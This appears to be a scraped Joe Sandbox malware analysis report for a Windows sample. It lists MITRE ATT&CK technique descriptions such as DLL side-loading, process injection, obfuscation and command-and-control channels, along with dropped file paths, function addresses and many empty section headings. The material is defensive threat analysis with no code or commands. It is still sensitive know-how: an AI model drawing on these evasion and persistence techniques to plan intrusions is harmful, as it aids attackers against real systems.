Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.
Tactics:	Lateral Movement
Data Sources:	File: File Creation, File: File Modification, Network Share: Network Share Access, Process: Process Creation
Platforms:	Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report yRc7UfFif9.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe

C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

C:\Program Files\7-Zip\Uninstall.exe

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_sgKbPm.exe_15788e6af638e4ca61bc4ad60d18f0c1b26e90_406eb2a6_75384484-70b2-4ba3-ad10-39d36d2c43d1\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5C47.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5DDE.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5E0E.tmp.xml

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\k1[1].rar

C:\Users\user\AppData\Local\Temp\38BC2A60.exe

C:\Users\user\AppData\Local\Temp\sgKbPm.exe

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Windows Analysis Report
yRc7UfFif9.exe

Function 00414044 Relevance: 33.4, APIs: 4, Strings: 15, Instructions: 171
fileprocessCOMMON

Function 004014E0 Relevance: 24.7, APIs: 9, Strings: 5, Instructions: 220
COMMON

Function 004021B8 Relevance: 3.0, APIs: 2, Instructions: 8
COMMONLIBRARYCODE

Function 004064D7 Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Function 004023D4 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Function 004010A0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 104
COMMON

Function 00C529E2 Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 128
stringfileCOMMON

Function 00C51099 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 74
stringsleepprocessCOMMON

Function 00C51718 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 65
timeCOMMON

Function 00C56076 Relevance: 11.1, APIs: 7, Instructions: 618
memoryCOMMON

Function 00C52B8C Relevance: 10.6, APIs: 7, Instructions: 74
threadstringCOMMON

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre